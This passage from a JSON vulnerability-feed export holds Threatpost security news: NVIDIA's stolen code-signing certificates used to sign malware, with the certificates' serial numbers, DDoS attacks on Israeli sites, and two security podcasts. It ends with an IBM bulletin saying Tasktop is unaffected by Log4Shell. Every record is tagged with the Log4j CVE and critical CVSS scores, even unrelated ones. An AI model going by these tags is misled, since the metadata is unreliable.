6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": 
"THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. 
He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 
23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still 
Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allows a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far-reaching consequences.\u201d\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. 
\u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. 
\u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. 
Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 
23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. 
It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s Nation Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. 
The incident led the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. 
Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nThe timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks**\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe, Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result, the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. 
\u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\n\u201cCybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:44", "description": "\n\n(Brought to you by Uptycs. 
Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nApplications are cybercriminals\u2019 favorite ways to crack open targeted organizations.\n\nYet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.\n\nAlex Rice, CTO at HackerOne, and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts.\n\nThey dropped by the Threatpost podcast recently to share tips on [DevSecOps](<https://threatpost.com/apps-built-better-devsecops-security-silver-bullet/167793/>), including:\n\n * How to build continual testing, monitoring and feedback processes to drive down application risk.\n * Developing a continuous approach to application security and DevOps security tools.\n * Why collaboration and continual feedback are essential across development, cloud and security teams.\n\n\u2026as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!\n\nHeads-up: Along with Aron Eidleman, Partner Solutions Architect at AWS, Alex and Johnathan will be participating in a joint [webinar](<https://www.hackerone.com/events/mitigate-risk-cloud-ethical-hackers-and-devops?utm_source=gitlab&utm_medium=partner&utm_campaign=social-mitigate-risk-cloud-with-hackers-devops>) on Feb. 23 to discuss the importance of layering security practices into your DevOps workflows.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/021422_GitLab_HackerOne_Mixdown_1.mp3>). For more podcasts, check out [Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n**_Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:00:14", "type": "threatpost", "title": "Kill Cloud Risk: Get Everybody to Stop Fighting Over App Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:00:14", "id": 
"THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "href": "https://threatpost.com/killing-cloud-risk-bulletproofing-app-security-podcast/178486/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:45:31", "description": "## Summary\n\nNo action is required for Tasktop Viz or Tasktop Sync or IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition as they were not impacted by this vulnerability. Sync or IBM LIA is using Log4J 1.2.15, which is very old and not subject to the Log4J vulnerability. The vulnerability was found in 2.15, but Sync is using 1.2.15\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nNone\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\nNo action is required for Tasktop Viz or Tasktop Sync/IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition as they were not impacted by this vulnerability. \n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWMXJ\",\"label\":\"Rational Lifecycle Integration Adapters\"},\"Component\":\"Tasktop\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.20 - 4.28, 1.2.0.12 - 1.2.0.20\",\"Edition\":\"IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition and Tasktop Sync\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:49:17", "type": "ibm", "title": "Security Bulletin: A Remote Attack Vulnerability in Apache Log4j affects IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition and Tasktop Sync", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
